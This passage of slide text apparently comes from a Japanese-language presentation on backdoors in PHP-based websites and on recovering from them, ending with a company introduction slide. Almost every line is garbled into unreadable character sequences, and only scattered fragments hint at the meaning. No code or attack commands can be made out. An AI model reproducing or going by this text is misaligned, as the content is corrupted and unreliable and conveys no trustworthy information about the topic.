    w ڪΒ͘8PSE1SFTTΛ࢖༻͍ͯ͠·͢ɻ
    w ࣗࣾͷೲ඼෺΍อकର৅෺Ͱͳ͘ͱ΋ɺ

    ͍͟ࠔͬͨΒօ͞Μʹ૬ஊ͕དྷΔ͸ͣͰ͢ɻ
    w ର؛ͷՐࣄͰ͸ͳ͘ɺ஫ҙשى͍͖ͯ͠·͠ΐ͏ɻ

    View Slide

  81. ͦͯ͠ͳʹΑΓɺ
    w όοΫυΞͷଟ͕͘1)1Ͱॻ͔Ε͍ͯ·͢ɻ
    w1)1FSͱͯ͠ɺ؃աͰ͖·ͤΜɻ

    View Slide

  82. όοΫυΞΛઃஔ͞Εͯ

    ͠·ͬͨΒ

    View Slide

  83. جຊํ਑
    w લड़ͷͱ͓Γɺ׬શۦআ͸ۃΊͯ೉͍͠Ͱ͢ɻ
    w ·ͣɺࠜຊݪҼͱͳΔ੬ऑੑΛಛఆ͠ɺഉআ͢Δɻ
    w ͦͷޙɺผͷαʔόΛཱͯɺ

    "߈ܸΛड͚ΔલͷόοΫΞοϓ͔ΒϦετΞ͢Δɻ

    #໨ࢹ֬ೝ͠ͳ͕Βɺ࣮֬ʹ҆શͳϑΝΠϧͷΈΛҠߦɻ

    View Slide

  84. ௒ઈࠎ͕ંΕΔ্ɺ
    શ͘ੜ࢈ੑͷͳ͍࡞ۀͳͷͰɺ
    ࢮʹͨ͘ͳΓ·͢ɻ

    View Slide

  85. ΍ΒΕ͔ͯΒͰ͸஗͍Ͱ͢ɻ

    View Slide

  86. ฐ্࢙ࣾ൪࠷ѱͩͬͨόοΫυΞରԠ
    w ๭8FC੍࡞ձࣾ͞Μ͔Βٽ͖͔ͭΕͯɺରԠɻ
    w Ҏ্ͷαΠτ͕ɺϨϯαόͷϚϧνυϝΠϯͰ

    ӡ༻͞Ε͓ͯΓɺಓ࿈Εඃ֐ɻ

    ˠҕୗݩ͔ΒΫϨʔϜͷཛྷɻ

    ˠݪҼಛఆࣗମ͕ۃΊͯ೉ߤɻ

    ˠϦετΞ΋Ҡ؅΋ඇݱ࣮తɻ
    w ׬શղܾʹϲ݄ۙ͘Λཁͨ͠ɻ

    View Slide

  87. ΋͏Ұ౓ݴ͍·͢ɻ
    ΍ΒΕ͔ͯΒͰ͸஗͍Ͱ͢ɻ

    View Slide

  88. ձࣾ঺հ
    IUUQTBEKQ
    w େࡕͷडୗϕϯμʔͰ͢ɻ
    w Θ͍Θ͍ΨϠΨϠ΍ͬͯΔձࣾͰ͢ɻ
    w ΤϯδχΞਵ࣌ืूதɻ

    View Slide